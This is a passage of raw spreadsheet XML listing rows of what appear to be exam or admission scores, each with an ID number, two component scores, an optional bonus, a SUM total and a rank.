      <c r="E689" s="8" t="n">
        <v>44.4</v>
      </c>
      <c r="F689" s="8" t="n">
        <v>42</v>
      </c>
      <c r="G689" s="8"/>
      <c r="H689" s="8" t="n">
        <f aca="false">SUM(E689:G689)</f>
        <v>86.4</v>
      </c>
      <c r="I689" s="8" t="n">
        <v>21</v>
      </c>
    </row>
    <row r="690" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A690" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B690" s="8" t="n">
        <v>1314012410</v>
      </c>
      <c r="C690" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D690" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E690" s="8" t="n">
        <v>37.4</v>
      </c>
      <c r="F690" s="8" t="n">
        <v>41</v>
      </c>
      <c r="G690" s="8"/>
      <c r="H690" s="8" t="n">
        <f aca="false">SUM(E690:G690)</f>
        <v>78.4</v>
      </c>
      <c r="I690" s="8" t="n">
        <v>22</v>
      </c>
    </row>
    <row r="691" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A691" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B691" s="8" t="n">
        <v>1314012327</v>
      </c>
      <c r="C691" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D691" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E691" s="8" t="n">
        <v>34</v>
      </c>
      <c r="F691" s="8" t="n">
        <v>36.6</v>
      </c>
      <c r="G691" s="8"/>
      <c r="H691" s="8" t="n">
        <f aca="false">SUM(E691:G691)</f>
        <v>70.6</v>
      </c>
      <c r="I691" s="8" t="n">
        <v>23</v>
      </c>
    </row>
    <row r="692" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A692" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B692" s="8" t="n">
        <v>1314012324</v>
      </c>
      <c r="C692" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D692" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E692" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F692" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G692" s="8"/>
      <c r="H692" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I692" s="8" t="n">
        <v>24</v>
      </c>
    </row>
    <row r="693" customFormat="false" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A693" s="9" t="n">
        <v>4300104</v>
      </c>
      <c r="B693" s="8" t="n">
        <v>1314012406</v>
      </c>
      <c r="C693" s="8" t="s">
        <v>163</v>
      </c>
      <c r="D693" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E693" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F693" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G693" s="8"/>
      <c r="H693" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I693" s="8" t="n">
        <v>24</v>
      </c>
    </row>
    <row r="694" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A694" s="9" t="n">
        <v>4300105</v>
      </c>
      <c r="B694" s="8" t="n">
        <v>1314012419</v>
      </c>
      <c r="C694" s="8" t="s">
        <v>164</v>
      </c>
      <c r="D694" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E694" s="8" t="n">
        <v>62.8</v>
      </c>
      <c r="F694" s="8" t="n">
        <v>65.8</v>
      </c>
      <c r="G694" s="8"/>
      <c r="H694" s="8" t="n">
        <f aca="false">SUM(E694:G694)</f>
        <v>128.6</v>
      </c>
      <c r="I694" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="695" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A695" s="9" t="n">
        <v>4300105</v>
      </c>
      <c r="B695" s="8" t="n">
        <v>1314012414</v>
      </c>
      <c r="C695" s="8" t="s">
        <v>164</v>
      </c>
      <c r="D695" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E695" s="8" t="n">
        <v>59</v>
      </c>
      <c r="F695" s="8" t="n">
        <v>66.4</v>
      </c>
      <c r="G695" s="8"/>
      <c r="H695" s="8" t="n">
        <f aca="false">SUM(E695:G695)</f>
        <v>125.4</v>
      </c>
      <c r="I695" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="696" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A696" s="9" t="n">
        <v>4300105</v>
      </c>
      <c r="B696" s="8" t="n">
        <v>1314012422</v>
      </c>
      <c r="C696" s="8" t="s">
        <v>164</v>
      </c>
      <c r="D696" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E696" s="8" t="n">
        <v>51</v>
      </c>
      <c r="F696" s="8" t="n">
        <v>70</v>
      </c>
      <c r="G696" s="8"/>
      <c r="H696" s="8" t="n">
        <f aca="false">SUM(E696:G696)</f>
        <v>121</v>
      </c>
      <c r="I696" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="697" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A697" s="9" t="n">
        <v>4300105</v>
      </c>
      <c r="B697" s="8" t="n">
        <v>1314012412</v>
      </c>
      <c r="C697" s="8" t="s">
        <v>164</v>
      </c>
      <c r="D697" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E697" s="8" t="n">
        <v>58.6</v>
      </c>
      <c r="F697" s="8" t="n">
        <v>55.8</v>
      </c>
      <c r="G697" s="8"/>
      <c r="H697" s="8" t="n">
        <f aca="false">SUM(E697:G697)</f>
        <v>114.4</v>
      </c>
      <c r="I697" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="698" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A698" s="9" t="n">
        <v>4300105</v>
      </c>
      <c r="B698" s="8" t="n">
        <v>1314012417</v>
      </c>
      <c r="C698" s="8" t="s">
        <v>164</v>
      </c>
      <c r="D698" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E698" s="8" t="n">
        <v>51.6</v>
      </c>
      <c r="F698" s="8" t="n">
        <v>61</v>
      </c>
      <c r="G698" s="8"/>
      <c r="H698" s="8" t="n">
        <f aca="false">SUM(E698:G698)</f>
        <v>112.6</v>
      </c>
      <c r="I698" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="699" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A699" s="9" t="n">
        <v>4300105</v>
      </c>
      <c r="B699" s="8" t="n">
        <v>1314012413</v>
      </c>
      <c r="C699" s="8" t="s">
        <v>164</v>
      </c>
      <c r="D699" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E699" s="8" t="n">
        <v>51</v>
      </c>
      <c r="F699" s="8" t="n">
        <v>57.8</v>
      </c>
      <c r="G699" s="8"/>
      <c r="H699" s="8" t="n">
        <f aca="false">SUM(E699:G699)</f>
        <v>108.8</v>
      </c>
      <c r="I699" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="700" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A700" s="9" t="n">
        <v>4300105</v>
      </c>
      <c r="B700" s="8" t="n">
        <v>1314012418</v>
      </c>
      <c r="C700" s="8" t="s">
        <v>164</v>
      </c>
      <c r="D700" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E700" s="8" t="n">
        <v>42.6</v>
      </c>
      <c r="F700" s="8" t="n">
        <v>61.2</v>
      </c>
      <c r="G700" s="8"/>
      <c r="H700" s="8" t="n">
        <f aca="false">SUM(E700:G700)</f>
        <v>103.8</v>
      </c>
      <c r="I700" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="701" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A701" s="9" t="n">
        <v>4300105</v>
      </c>
      <c r="B701" s="8" t="n">
        <v>1314012415</v>
      </c>
      <c r="C701" s="8" t="s">
        <v>164</v>
      </c>
      <c r="D701" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E701" s="8" t="n">
        <v>43.4</v>
      </c>
      <c r="F701" s="8" t="n">
        <v>51.8</v>
      </c>
      <c r="G701" s="8"/>
      <c r="H701" s="8" t="n">
        <f aca="false">SUM(E701:G701)</f>
        <v>95.2</v>
      </c>
      <c r="I701" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="702" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A702" s="9" t="n">
        <v>4300105</v>
      </c>
      <c r="B702" s="8" t="n">
        <v>1314012416</v>
      </c>
      <c r="C702" s="8" t="s">
        <v>164</v>
      </c>
      <c r="D702" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E702" s="8" t="n">
        <v>43.4</v>
      </c>
      <c r="F702" s="8" t="n">
        <v>51</v>
      </c>
      <c r="G702" s="8"/>
      <c r="H702" s="8" t="n">
        <f aca="false">SUM(E702:G702)</f>
        <v>94.4</v>
      </c>
      <c r="I702" s="8" t="n">
        <v>9</v>
      </c>
    </row>
    <row r="703" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A703" s="9" t="n">
        <v>4300105</v>
      </c>
      <c r="B703" s="8" t="n">
        <v>1314012421</v>
      </c>
      <c r="C703" s="8" t="s">
        <v>164</v>
      </c>
      <c r="D703" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E703" s="8" t="n">
        <v>36.2</v>
      </c>
      <c r="F703" s="8" t="n">
        <v>54</v>
      </c>
      <c r="G703" s="8"/>
      <c r="H703" s="8" t="n">
        <f aca="false">SUM(E703:G703)</f>
        <v>90.2</v>
      </c>
      <c r="I703" s="8" t="n">
        <v>10</v>
      </c>
    </row>
    <row r="704" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A704" s="9" t="n">
        <v>4300105</v>
      </c>
      <c r="B704" s="8" t="n">
        <v>1314012420</v>
      </c>
      <c r="C704" s="8" t="s">
        <v>164</v>
      </c>
      <c r="D704" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E704" s="8" t="n">
        <v>42.2</v>
      </c>
      <c r="F704" s="8" t="n">
        <v>39.4</v>
      </c>
      <c r="G704" s="8"/>
      <c r="H704" s="8" t="n">
        <f aca="false">SUM(E704:G704)</f>
        <v>81.6</v>
      </c>
      <c r="I704" s="8" t="n">
        <v>11</v>
      </c>
    </row>
    <row r="705" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A705" s="9" t="n">
        <v>4300106</v>
      </c>
      <c r="B705" s="8" t="n">
        <v>1314012424</v>
      </c>
      <c r="C705" s="8" t="s">
        <v>165</v>
      </c>
      <c r="D705" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E705" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="F705" s="8" t="n">
        <v>72.6</v>
      </c>
      <c r="G705" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H705" s="8" t="n">
        <f aca="false">SUM(E705:G705)</f>
        <v>141.2</v>
      </c>
      <c r="I705" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="706" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A706" s="9" t="n">
        <v>4300106</v>
      </c>
      <c r="B706" s="8" t="n">
        <v>1314012423</v>
      </c>
      <c r="C706" s="8" t="s">
        <v>165</v>
      </c>
      <c r="D706" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E706" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="F706" s="8" t="n">
        <v>62.2</v>
      </c>
      <c r="G706" s="8"/>
      <c r="H706" s="8" t="n">
        <f aca="false">SUM(E706:G706)</f>
        <v>124.8</v>
      </c>
      <c r="I706" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="707" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A707" s="9" t="n">
        <v>4300106</v>
      </c>
      <c r="B707" s="8" t="n">
        <v>1314012425</v>
      </c>
      <c r="C707" s="8" t="s">
        <v>165</v>
      </c>
      <c r="D707" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E707" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F707" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G707" s="8"/>
      <c r="H707" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I707" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="708" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A708" s="9" t="n">
        <v>4300107</v>
      </c>
      <c r="B708" s="8" t="n">
        <v>1314012426</v>
      </c>
      <c r="C708" s="8" t="s">
        <v>166</v>
      </c>
      <c r="D708" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E708" s="8" t="n">
        <v>67</v>
      </c>
      <c r="F708" s="8" t="n">
        <v>71</v>
      </c>
      <c r="G708" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H708" s="8" t="n">
        <f aca="false">SUM(E708:G708)</f>
        <v>141</v>
      </c>
      <c r="I708" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="709" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A709" s="9" t="n">
        <v>4300107</v>
      </c>
      <c r="B709" s="8" t="n">
        <v>1314012428</v>
      </c>
      <c r="C709" s="8" t="s">
        <v>166</v>
      </c>
      <c r="D709" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E709" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="F709" s="8" t="n">
        <v>71.8</v>
      </c>
      <c r="G709" s="8"/>
      <c r="H709" s="8" t="n">
        <f aca="false">SUM(E709:G709)</f>
        <v>137.4</v>
      </c>
      <c r="I709" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="710" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A710" s="9" t="n">
        <v>4300107</v>
      </c>
      <c r="B710" s="8" t="n">
        <v>1314012427</v>
      </c>
      <c r="C710" s="8" t="s">
        <v>166</v>
      </c>
      <c r="D710" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E710" s="8" t="n">
        <v>52</v>
      </c>
      <c r="F710" s="8" t="n">
        <v>63.8</v>
      </c>
      <c r="G710" s="8"/>
      <c r="H710" s="8" t="n">
        <f aca="false">SUM(E710:G710)</f>
        <v>115.8</v>
      </c>
      <c r="I710" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="711" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A711" s="9" t="n">
        <v>4300108</v>
      </c>
      <c r="B711" s="8" t="n">
        <v>1314012512</v>
      </c>
      <c r="C711" s="8" t="s">
        <v>167</v>
      </c>
      <c r="D711" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E711" s="8" t="n">
        <v>63.4</v>
      </c>
      <c r="F711" s="8" t="n">
        <v>71.6</v>
      </c>
      <c r="G711" s="8" t="n">
        <v>3</v>
      </c>
      <c r="H711" s="8" t="n">
        <f aca="false">SUM(E711:G711)</f>
        <v>138</v>
      </c>
      <c r="I711" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="712" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A712" s="9" t="n">
        <v>4300108</v>
      </c>
      <c r="B712" s="8" t="n">
        <v>1314012511</v>
      </c>
      <c r="C712" s="8" t="s">
        <v>167</v>
      </c>
      <c r="D712" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E712" s="8" t="n">
        <v>62.4</v>
      </c>
      <c r="F712" s="8" t="n">
        <v>66.6</v>
      </c>
      <c r="G712" s="8"/>
      <c r="H712" s="8" t="n">
        <f aca="false">SUM(E712:G712)</f>
        <v>129</v>
      </c>
      <c r="I712" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="713" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A713" s="9" t="n">
        <v>4300108</v>
      </c>
      <c r="B713" s="8" t="n">
        <v>1314012429</v>
      </c>
      <c r="C713" s="8" t="s">
        <v>167</v>
      </c>
      <c r="D713" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E713" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="F713" s="8" t="n">
        <v>65.2</v>
      </c>
      <c r="G713" s="8" t="n">
        <v>5</v>
      </c>
      <c r="H713" s="8" t="n">
        <f aca="false">SUM(E713:G713)</f>
        <v>128.4</v>
      </c>
      <c r="I713" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="714" s="10" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A714" s="9" t="n">
        <v>4300108</v>
      </c>
      <c r="B714" s="8" t="n">
        <v>1314012430</v>
      </c>
      <c r="C714" s="8" t="s">
        <v>167</v>
      </c>
      <c r="D714" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E714" s="8" t="n">
        <v>53.6</v>
      </c>
      <c r="F714" s="8" t="n">
        <v>59.8</v>
      </c>
      <c r="G714" s="8"/>
      <c r="H714" s="8" t="n">
        <f aca="false">SUM(E714:G714)</f>
        <v>113.4</v>
      </c>
      <c r="I714" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="715" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A715" s="8" t="n">
        <v>4300109</v>
      </c>
      <c r="B715" s="8" t="n">
        <v>1314011004</v>
      </c>
      <c r="C715" s="8" t="s">
        <v>168</v>
      </c>
      <c r="D715" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E715" s="8" t="n">
        <v>62.6</v>
      </c>
      <c r="F715" s="8" t="n">
        <v>63.2</v>
      </c>
      <c r="G715" s="8"/>
      <c r="H715" s="8" t="n">
        <f aca="false">SUM(E715:G715)</f>
        <v>125.8</v>
      </c>
      <c r="I715" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="716" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A716" s="8" t="n">
        <v>4300109</v>
      </c>
      <c r="B716" s="8" t="n">
        <v>1314011002</v>
      </c>
      <c r="C716" s="8" t="s">
        <v>168</v>
      </c>
      <c r="D716" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E716" s="8" t="n">
        <v>61</v>
      </c>
      <c r="F716" s="8" t="n">
        <v>58.2</v>
      </c>
      <c r="G716" s="8"/>
      <c r="H716" s="8" t="n">
        <f aca="false">SUM(E716:G716)</f>
        <v>119.2</v>
      </c>
      <c r="I716" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="717" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A717" s="8" t="n">
        <v>4300109</v>
      </c>
      <c r="B717" s="8" t="n">
        <v>1314011001</v>
      </c>
      <c r="C717" s="8" t="s">
        <v>168</v>
      </c>
      <c r="D717" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E717" s="8" t="n">
        <v>53.8</v>
      </c>
      <c r="F717" s="8" t="n">
        <v>58.6</v>
      </c>
      <c r="G717" s="8"/>
      <c r="H717" s="8" t="n">
        <f aca="false">SUM(E717:G717)</f>
        <v>112.4</v>
      </c>
      <c r="I717" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="718" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A718" s="8" t="n">
        <v>4300109</v>
      </c>
      <c r="B718" s="8" t="n">
        <v>1314011003</v>
      </c>
      <c r="C718" s="8" t="s">
        <v>168</v>
      </c>
      <c r="D718" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E718" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F718" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G718" s="8"/>
      <c r="H718" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I718" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="719" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A719" s="8" t="n">
        <v>4300109</v>
      </c>
      <c r="B719" s="8" t="n">
        <v>1314011005</v>
      </c>
      <c r="C719" s="8" t="s">
        <v>168</v>
      </c>
      <c r="D719" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E719" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F719" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G719" s="8"/>
      <c r="H719" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I719" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="720" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A720" s="8" t="n">
        <v>4300110</v>
      </c>
      <c r="B720" s="8" t="n">
        <v>1314011006</v>
      </c>
      <c r="C720" s="8" t="s">
        <v>169</v>
      </c>
      <c r="D720" s="8" t="s">
        <v>170</v>
      </c>
      <c r="E720" s="8" t="n">
        <v>43.6</v>
      </c>
      <c r="F720" s="8" t="n">
        <v>47.4</v>
      </c>
      <c r="G720" s="8"/>
      <c r="H720" s="8" t="n">
        <f aca="false">SUM(E720:G720)</f>
        <v>91</v>
      </c>
      <c r="I720" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="721" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A721" s="8" t="n">
        <v>4300110</v>
      </c>
      <c r="B721" s="8" t="n">
        <v>1314011007</v>
      </c>
      <c r="C721" s="8" t="s">
        <v>169</v>
      </c>
      <c r="D721" s="8" t="s">
        <v>170</v>
      </c>
      <c r="E721" s="8" t="n">
        <v>31.6</v>
      </c>
      <c r="F721" s="8" t="n">
        <v>56.6</v>
      </c>
      <c r="G721" s="8"/>
      <c r="H721" s="8" t="n">
        <f aca="false">SUM(E721:G721)</f>
        <v>88.2</v>
      </c>
      <c r="I721" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="722" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A722" s="8" t="n">
        <v>4300110</v>
      </c>
      <c r="B722" s="8" t="n">
        <v>1314011008</v>
      </c>
      <c r="C722" s="8" t="s">
        <v>169</v>
      </c>
      <c r="D722" s="8" t="s">
        <v>170</v>
      </c>
      <c r="E722" s="8" t="n">
        <v>47.2</v>
      </c>
      <c r="F722" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G722" s="8"/>
      <c r="H722" s="8" t="n">
        <v>47.2</v>
      </c>
      <c r="I722" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="723" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A723" s="8" t="n">
        <v>4300111</v>
      </c>
      <c r="B723" s="8" t="n">
        <v>1314011014</v>
      </c>
      <c r="C723" s="8" t="s">
        <v>171</v>
      </c>
      <c r="D723" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E723" s="8" t="n">
        <v>61.6</v>
      </c>
      <c r="F723" s="8" t="n">
        <v>66.2</v>
      </c>
      <c r="G723" s="8"/>
      <c r="H723" s="8" t="n">
        <f aca="false">SUM(E723:G723)</f>
        <v>127.8</v>
      </c>
      <c r="I723" s="8" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="724" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A724" s="8" t="n">
        <v>4300111</v>
      </c>
      <c r="B724" s="8" t="n">
        <v>1314011016</v>
      </c>
      <c r="C724" s="8" t="s">
        <v>171</v>
      </c>
      <c r="D724" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E724" s="8" t="n">
        <v>55.2</v>
      </c>
      <c r="F724" s="8" t="n">
        <v>65.6</v>
      </c>
      <c r="G724" s="8"/>
      <c r="H724" s="8" t="n">
        <f aca="false">SUM(E724:G724)</f>
        <v>120.8</v>
      </c>
      <c r="I724" s="8" t="n">
        <v>2</v>
      </c>
    </row>
    <row r="725" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A725" s="8" t="n">
        <v>4300111</v>
      </c>
      <c r="B725" s="8" t="n">
        <v>1314011011</v>
      </c>
      <c r="C725" s="8" t="s">
        <v>171</v>
      </c>
      <c r="D725" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E725" s="8" t="n">
        <v>60</v>
      </c>
      <c r="F725" s="8" t="n">
        <v>60.6</v>
      </c>
      <c r="G725" s="8"/>
      <c r="H725" s="8" t="n">
        <f aca="false">SUM(E725:G725)</f>
        <v>120.6</v>
      </c>
      <c r="I725" s="8" t="n">
        <v>3</v>
      </c>
    </row>
    <row r="726" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A726" s="8" t="n">
        <v>4300111</v>
      </c>
      <c r="B726" s="8" t="n">
        <v>1314011012</v>
      </c>
      <c r="C726" s="8" t="s">
        <v>171</v>
      </c>
      <c r="D726" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E726" s="8" t="n">
        <v>57.4</v>
      </c>
      <c r="F726" s="8" t="n">
        <v>61</v>
      </c>
      <c r="G726" s="8"/>
      <c r="H726" s="8" t="n">
        <f aca="false">SUM(E726:G726)</f>
        <v>118.4</v>
      </c>
      <c r="I726" s="8" t="n">
        <v>4</v>
      </c>
    </row>
    <row r="727" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A727" s="8" t="n">
        <v>4300111</v>
      </c>
      <c r="B727" s="8" t="n">
        <v>1314011010</v>
      </c>
      <c r="C727" s="8" t="s">
        <v>171</v>
      </c>
      <c r="D727" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E727" s="8" t="n">
        <v>51.2</v>
      </c>
      <c r="F727" s="8" t="n">
        <v>61.8</v>
      </c>
      <c r="G727" s="8"/>
      <c r="H727" s="8" t="n">
        <f aca="false">SUM(E727:G727)</f>
        <v>113</v>
      </c>
      <c r="I727" s="8" t="n">
        <v>5</v>
      </c>
    </row>
    <row r="728" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A728" s="8" t="n">
        <v>4300111</v>
      </c>
      <c r="B728" s="8" t="n">
        <v>1314011013</v>
      </c>
      <c r="C728" s="8" t="s">
        <v>171</v>
      </c>
      <c r="D728" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E728" s="8" t="n">
        <v>46</v>
      </c>
      <c r="F728" s="8" t="n">
        <v>60</v>
      </c>
      <c r="G728" s="8"/>
      <c r="H728" s="8" t="n">
        <f aca="false">SUM(E728:G728)</f>
        <v>106</v>
      </c>
      <c r="I728" s="8" t="n">
        <v>6</v>
      </c>
    </row>
    <row r="729" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A729" s="8" t="n">
        <v>4300111</v>
      </c>
      <c r="B729" s="8" t="n">
        <v>1314011009</v>
      </c>
      <c r="C729" s="8" t="s">
        <v>171</v>
      </c>
      <c r="D729" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E729" s="8" t="n">
        <v>49.4</v>
      </c>
      <c r="F729" s="8" t="n">
        <v>55.2</v>
      </c>
      <c r="G729" s="8"/>
      <c r="H729" s="8" t="n">
        <f aca="false">SUM(E729:G729)</f>
        <v>104.6</v>
      </c>
      <c r="I729" s="8" t="n">
        <v>7</v>
      </c>
    </row>
    <row r="730" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A730" s="8" t="n">
        <v>4300111</v>
      </c>
      <c r="B730" s="8" t="n">
        <v>1314011015</v>
      </c>
      <c r="C730" s="8" t="s">
        <v>171</v>
      </c>
      <c r="D730" s="8" t="s">
        <v>127</v>
      </c>
      <c r="E730" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="F730" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="G730" s="8"/>
      <c r="H730" s="8" t="n">
        <v>-1</v>
      </c>
      <c r="I730" s="8" t="n">
        <v>8</v>
      </c>
    </row>
    <row r="731" s="5" customFormat="true" ht="19.5" hidden="false" customHeight="true" outlineLevel="0" collapsed="false">
      <c r="A731" s="8" t="n">
        <v>4300112</v>
      </c>
      <c r="B731" s="8" t="n">
        <v>1314011017</v>
      </c>
      <c r="C731" s="8" t="s">
        <v>172</v>
      </c>
      <c r="D731" s="8" t="s">
        <v>133</v>
      </c>
      <c r="E731" s="8" t="n">
        <v>56.4</v>
      </c>
      <c r="F731" s="8" t="n">
        <v>66.8</v>
      </c>
      <c r="G731" s="8"/>
      <c r="H731" s="8" t="n">
        <f aca="false">SUM(E731:G731)</f>
        <v>123.2</v>
      </c>
      <c r="I731" s="8" t="n">
        <v>1</v>
      </c>
    </row>
